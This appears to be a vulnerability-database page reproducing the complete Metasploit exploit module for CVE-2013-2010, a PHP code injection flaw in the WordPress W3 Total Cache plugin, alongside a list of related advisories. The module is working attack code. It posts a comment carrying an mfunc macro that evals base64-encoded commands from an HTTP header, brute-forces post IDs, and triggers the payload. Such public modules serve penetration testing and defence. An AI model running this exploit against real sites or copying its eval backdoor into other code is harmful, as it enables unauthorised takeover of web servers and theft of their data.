Lucene search
K

WordPress W3 Total Cache PHP Code Execution

🗓️ 24 Mar 2015 00:00:00Reported by H D MooreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

WordPress W3 Total Cache PHP Code Execution vulnerability in versions up to 0.9.2.8 allows arbitrary PHP code injection via 'mfunc'. Successful exploitation requires a valid post ID, and unchecked "A comment is held for moderation" option. Authenticated comment publishing also bypasses certain security checks

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-2010
1 May 201300:00
circl
Check Point Advisories
WordPress W3 Total Cache and W3 Super Cache PHP Code Execution (CVE-2013-2010)
26 Nov 201500:00
checkpoint_advisories
CVE
CVE-2013-2010
12 Feb 202014:45
cve
Cvelist
CVE-2013-2010
12 Feb 202014:45
cvelist
Dsquare
W3 Total Cache Plugin Remote Code Execution
14 Mar 201400:00
dsquare
Metasploit
WordPress W3 Total Cache PHP Code Execution
23 Mar 201507:15
metasploit
NVD
CVE-2013-2010
12 Feb 202015:15
nvd
Prion
Remote code execution
12 Feb 202015:15
prion
RedhatCVE
CVE-2013-2010
22 May 202511:16
redhatcve
Tenable Nessus
W3 Total Cache Plugin for WordPress Multiple Insecure PHP Code Inclusion Macros Remote Code Execution
3 May 201300:00
nessus
Rows per page
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class Metasploit3 < Msf::Exploit::Remote  
include Msf::HTTP::Wordpress  
include Msf::Exploit::Remote::HttpClient  
  
Rank = ExcellentRanking  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'WordPress W3 Total Cache PHP Code Execution',  
'Description' => %q{  
This module exploits a PHP Code Injection vulnerability against WordPress plugin  
W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older  
is also reported as vulnerable. The vulnerability is due to the handling of certain  
macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is  
needed in order to add the malicious comment. If the POSTID option isn't specified,  
then the module will automatically find or bruteforce one. Also, if anonymous comments  
aren't allowed, then a valid username and password must be provided. In addition,  
the "A comment is held for moderation" option on WordPress must be unchecked for  
successful exploitation. This module has been tested against WordPress 3.5 and  
W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.  
},  
'Author' =>  
[  
'Unknown', # Vulnerability discovery  
'juan vazquez', # Metasploit module  
'hdm', # Metasploit module  
'Christian Mehlmauer' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2013-2010' ],  
[ 'OSVDB', '92652' ],  
[ 'BID', '59316' ],  
[ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],  
[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ],  
[ 'WPVDB', '6622' ]  
],  
'Privileged' => false,  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Payload' =>  
{  
'DisableNops' => true,  
},  
'Targets' => [ ['Wordpress 3.5', {}] ],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 17 2013'  
))  
  
register_options(  
[  
OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),  
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),  
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])  
], self.class)  
  
register_advanced_options(  
[  
OptInt.new('MIN_POST_ID', [ false, 'Specify the first post_id used for bruteforce', 1]),  
OptInt.new('MAX_POST_ID', [ false, 'Specify the last post_id used for bruteforce', 1000])  
])  
end  
  
def require_auth?  
@user = datastore['USERNAME']  
@password = datastore['PASSWORD']  
  
if @user and @password and not @user.empty? and not @password.empty?  
return true  
else  
return false  
end  
end  
  
def post_comment(text)  
php_payload = "#{text}<!--mfunc if(isset($_SERVER['HTTP_SUM'])) { if (sha1($_SERVER['HTTP_SUM']) == '#{@sum}' ) { eval(base64_decode($_SERVER['HTTP_CMD'])); } } --><!--/mfunc-->"  
  
if @auth  
uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)  
else  
author = rand_text_alpha(8)  
author_email = "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com"  
author_url = rand_text_alpha(8)  
uri = wordpress_post_comment_no_auth(php_payload,  
@post_id,  
author,  
author_email,  
author_url  
)  
@unauth_cookie = wordpress_get_unauth_comment_cookies(author, author_email, author_url)  
end  
uri  
end  
  
def exploit  
unless wordpress_and_online?  
fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")  
end  
  
@auth = require_auth?  
  
if @auth  
print_status("#{peer} - Trying to login...")  
@cookie = wordpress_login(@user, @password)  
if @cookie.nil?  
fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")  
end  
print_status("#{peer} - login successful")  
else  
print_status("#{peer} - Trying unauthenticated exploitation...")  
end  
  
if datastore['POSTID'] and datastore['POSTID'] != 0  
@post_id = datastore['POSTID']  
print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")  
else  
print_status("#{peer} - Trying to get posts from feed...")  
all_posts = wordpress_get_all_blog_posts_via_feed  
# First try all blog posts provided by feed  
if all_posts  
all_posts.each do |p|  
vprint_status("#{peer} - Checking #{p}...")  
enabled = wordpress_post_comments_enabled?(p, @cookie)  
@post_id = get_post_id_from_body(enabled)  
if @post_id  
print_status("#{peer} - Found Post POST ID #{@post_id}...")  
break  
end  
end  
end  
# if nothing found, bruteforce a post id  
unless @post_id  
print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...")  
min_post_id = datastore['MIN_POST_ID']  
max_post_id = datastore['MAX_POST_ID']  
@post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie)  
if @post_id.nil?  
fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")  
else  
print_status("#{peer} - Using the brute forced POST ID #{@post_id}...")  
end  
end  
end  
  
random_test = rand_text_alpha(64)  
@sum = Rex::Text.sha1(random_test)  
  
print_status("#{peer} - Injecting the PHP Code in a comment...")  
text = Rex::Text::rand_text_alpha(10)  
post_uri = post_comment(text)  
if post_uri.nil?  
fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned")  
end  
  
print_status("#{peer} - Executing the payload...")  
options = {  
'method' => 'GET',  
'uri' => post_uri,  
'headers' => {  
'Cmd' => Rex::Text.encode_base64(payload.encoded),  
'Sum' => random_test  
}  
}  
options.merge!({'cookie' => @cookie}) if @auth  
# Used to see anonymous, moderated comments  
options.merge!({'cookie' => @unauth_cookie}) if @unauth_cookie  
res = send_request_cgi(options)  
if res and res.code == 301  
fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")  
end  
  
if res and !res.body.match(/#{Regexp.escape(text)}/)  
fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated")  
end  
  
end  
  
def check  
res = wordpress_and_online?  
unless res  
vprint_error("#{peer} does not seeem to be Wordpress site")  
return Exploit::CheckCode::Unknown  
end  
  
if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/  
version = $1  
if version <= "0.9.2.8"  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/)  
return Exploit::CheckCode::Detected  
end  
  
return Exploit::CheckCode::Safe  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation